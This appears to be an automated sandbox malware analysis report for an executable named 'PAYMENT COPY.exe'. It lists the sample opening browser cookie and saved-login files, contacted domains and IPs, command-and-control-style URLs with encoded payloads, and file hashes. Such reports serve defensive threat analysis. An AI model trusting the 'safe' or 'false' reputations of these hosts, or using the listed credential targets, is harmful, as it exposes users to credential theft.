Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.supermontage.com	United States	16509	AMAZON-02US	false
136.143.186.12	zhs.zohosites.com	United States	2639	ZOHO-ASUS	false
103.120.178.210	knockdubai.ae	India	17439	NETMAGIC-APNetmagicDatacenterMumbaiIN	false
89.42.218.92	mediciconstanta.ro	Romania	205275	ROMARGRO	false
172.67.137.210	www.drednents.es	United States	13335	CLOUDFLARENETUS	false
66.29.149.46	www.spotgush.top	United States	19538	ADVANTAGECOMUS	false
199.59.243.225	www.chooceseafood.ca	United States	395082	BODIS-NJUS	false
50.116.86.54	celluslim.com.br	United States	46606	UNIFIEDLAYER-AS-1US	false
217.107.219.102	www.arsenjev.fun	Russian Federation	8342	RTCOMM-ASRU	false
202.233.67.46	www.embrace-counselor.com	Japan	4675	U-NETSURFUNIADEXLTDJP	false
185.215.4.44	shy-models.ru	Denmark	50129	TVHORADADAES	false
31.31.198.106	www.skinut-ves.ru	Russian Federation	197695	AS-REGRU	false
216.40.34.41	www.pinpointopia.com	Canada	15348	TUCOWSCA	false

Name	IP	Active
mediciconstanta.ro	89.42.218.92	true
www.arsenjev.fun	217.107.219.102	true
shy-models.ru	185.215.4.44	true
www.spotgush.top	66.29.149.46	true
www.chooceseafood.ca	199.59.243.225	true
www.drednents.es	172.67.137.210	true
www.pinpointopia.com	216.40.34.41	true
celluslim.com.br	50.116.86.54	true
www.supermontage.com	13.248.169.48	true
zhs.zohosites.com	136.143.186.12	true
www.drdavidglassman.com	199.59.243.225	true
www.embrace-counselor.com	202.233.67.46	true
knockdubai.ae	103.120.178.210	true
www.skinut-ves.ru	31.31.198.106	true
www.digishieldu.online	unknown	unknown
www.mediciconstanta.ro	unknown	unknown
www.knockdubai.ae	unknown	unknown
www.shy-models.ru	unknown	unknown
www.celluslim.com.br	unknown	unknown
www.topscaleservices.com	unknown	unknown
www.onitango-test.com	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.mediciconstanta.ro/jaeg/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.knockdubai.ae/s5gg/	false	Avira URL Cloud: safe	unknown
http://www.skinut-ves.ru/pf45/?VlEHDVvh=+FYLzbf4tuJqmfBE/IGOfF0r+MHgP4o87eLDAHdmTpq2bw1UrUMWUoU66GOKJ7n5AfomTNLEJ4yDFS4nbynVDFN+PHUTvroy3xH/fpiwWIz3Kb5ThfITUHU=&BHPD=o2nt	false	Avira URL Cloud: malware	unknown
http://www.shy-models.ru/spev/?VlEHDVvh=tbEztHv7aRBF16/vS4ReUtdihzrMDj2O7MCPG/vC1Jml0QkKRnSSU8sUdUNE92nxSgZvf0qXlo0KJW6hnlqWydczzuvw5M1cQ8Ki08JizjbM/1/wqRnw39c=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.arsenjev.fun/oqq6/	false	Avira URL Cloud: safe	unknown
http://www.embrace-counselor.com/5xhc/?VlEHDVvh=MlmeOAVABHl7V7JWE669wIJbTLHKaUkhN9NjdS3PgsP7eMcTlCivolpOMqUU2YL5bEhebrvuWwjxxfDDk/ZIeLQ1wF+hSOQ+omIdi18JN7A0f8vC6TD737s=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.drdavidglassman.com/rydx/?VlEHDVvh=yFQmHiiKcR7mSVWuRw8RQpo4LJVZTLcWi6hJF+Rn4pNF9HaZnauVsiHAA7JcJP010hHBzc/zc7n9tAOpAjixnZqk0gAODdt0gSRPUe/o9m+q8oWrf5RESRg=&BHPD=o2nt	false	Avira URL Cloud: malware	unknown
http://www.pinpointopia.com/w8kk/	false	Avira URL Cloud: safe	unknown
http://www.supermontage.com/9i8t/	false	Avira URL Cloud: safe	unknown
http://www.pinpointopia.com/w8kk/?VlEHDVvh=xApCedPshlFqhM+jKZfmvnpl71z0cBQVdhsyYTPYXO8jvxnjhAjWxt0ri1XYL1kB/lDsxIYle23q9eZueg3dcjYKciZZWPOZx8TMcQAQa9bvKBBzdKnYGI4=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.celluslim.com.br/y8lu/?VlEHDVvh=mWlJviWR5LwtuCLZCQRXGA+vQb38eHFgRBz6unIHe4HBIxzvdSvdhO03jK4wsowAz3gHYbTW35gnt1fPF07v4JZ2cMipkMMw/S8lqxq9gNP1PGwmWBqthC4=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.spotgush.top/ni9v/?VlEHDVvh=1qDi8Q0JYC/+jowmm6vhnz1nUg+FzSnwkBEF+9sZfgdAuqPr9wV9FjKgoqnVlqm9IHxz/wQEEdcJ3vr/ooFd412OQCGzSxMe6/jXu+QS8SjFcrOZORUu8fo=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.spotgush.top/ni9v/	false	Avira URL Cloud: safe	unknown
http://www.topscaleservices.com/uyud/	false	Avira URL Cloud: safe	unknown
http://www.arsenjev.fun/oqq6/?VlEHDVvh=rwgwPlALEUzYU2aVnuvDPIeIRMF/prMxeEAjcX/DBUkDQJY+y8rHCEXmR7eGsa/wgYTHR39WGVXgcrNwnNHcmkfubB89b8ls2WhHljXtxKg/z1p/kKzkfHY=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.drdavidglassman.com/rydx/	false	Avira URL Cloud: malware	unknown
http://www.chooceseafood.ca/ru1k/	false	Avira URL Cloud: safe	unknown
http://www.shy-models.ru/spev/	false	Avira URL Cloud: safe	unknown
http://www.knockdubai.ae/s5gg/?VlEHDVvh=Lex3y3SP4nMuJeMgNnltykKJrtse07Leq1Ynk5nBUbN+LWWMQkpVzy+EMOTic1Ks5WEW61I3b9noLb4lZz3/VBahdTtzKpjYDK5Fm2hl+YH8rBOlCQe91Nk=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.drednents.es/9bwj/	false	Avira URL Cloud: safe	unknown
http://www.drednents.es/9bwj/?VlEHDVvh=+7XJqbUQcguxa/KcUhsZdHSIPDv12M145Gf+kZkuNm6BJEH5M4YG3TEKS2nGgF42YhScJBjRA7U3xzFEvpUC1m9E0lF3kGvEoHdRMqPZgXJQjJurfTYwuhc=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.mediciconstanta.ro/jaeg/?VlEHDVvh=9Opn4WO2xZgxxNDkNGsIia6GoKuxBfXh3HU6nJUJOovQ2Daq2EsR8T6osHZN6Oos26YiOKjRaUape58pdui5fF9pfPUX5VWYS5msIkgnGD14mtGY1feIQ7U=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.celluslim.com.br/y8lu/	false	Avira URL Cloud: safe	unknown
http://www.supermontage.com/9i8t/?VlEHDVvh=2T5+pGPdigXxZZx8gY/OSLODLjvvwj0MjlV7S+1Ldbgia1Gm71jO+3C1ccfYbIwVvCUgnk/aeboESokRLTli2QWqQswZxn4Hxw0zC18njeajG3czp+Bsx3U=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.topscaleservices.com/uyud/?VlEHDVvh=a4DuWa1aWcmJH21/SNxRR+JRQb1v/kzaj3WKu4zLUxUUlKGTu9D1sWAogGI9gEZiY1gr5T6O35XBnrIr/I/ZCy9af/SljyarCQCdkJfuLPpdjFvVaxfdqpU=&BHPD=o2nt	false	Avira URL Cloud: safe	unknown
http://www.embrace-counselor.com/5xhc/	false	Avira URL Cloud: safe	unknown

ID:	1447913
Product:	CloudBasic
Start time:	12:18:22
Start date:	27.05.2024
Sample:	PAYMENT COPY.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	a05649b0d742e857fc002ac0b7759512
SHA1:	84051af6ed4aec8f1209d5f7ead77f20b8bffc2b
SHA256:	94ad0e1f81c61142471ffd1cbc66caf209d43aa514702033728a51e672702d6c
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	DD468C0F7F5C01E4D8F8142ED1D260D8	6E5D9DE3ACCC5A2694B9EFE13364F2421B4D3092	1A1EEDA1B30E20F3F708B835546D15CAB938E80C02BF59A788B42F83DCE7C7F0
C:\Users\user\AppData\Local\Temp\4jm-6-hL7	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	87EE0BBB38B11E14090EF60A7D56C8B1	37966F94007814B687989937B4A299FA816581ED	22CD1C8F26B721A19A1E9108D16AB419ABAD17D34ACDA62CAE3004014D88437E
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mebfolc.liw.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uzprlt2.ptq.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqhej52h.2qy.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfot3gfl.h2a.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtxbro3o.ale.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yl53tnli.vg4.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z55jwqv5.y2t.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztmcufib.3lt.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\tmp1D60.tmp	XML 1.0 document, ASCII text	6C8A7DAC2ACC860681126F79A467C74F	5E16E7AC402411D848EF7F0E2D7462E126C6D028	23CBD5EF3B8AE1812168A5C6841CB84AB82F2B485793F4A450DC2AC8C903286E
C:\Users\user\AppData\Local\Temp\tmp525.tmp	XML 1.0 document, ASCII text	6C8A7DAC2ACC860681126F79A467C74F	5E16E7AC402411D848EF7F0E2D7462E126C6D028	23CBD5EF3B8AE1812168A5C6841CB84AB82F2B485793F4A450DC2AC8C903286E
C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	A05649B0D742E857FC002AC0B7759512	84051AF6ED4AEC8F1209D5F7EAD77F20B8BFFC2B	94AD0E1F81C61142471FFD1CBC66CAF209D43AA514702033728A51E672702D6C
C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309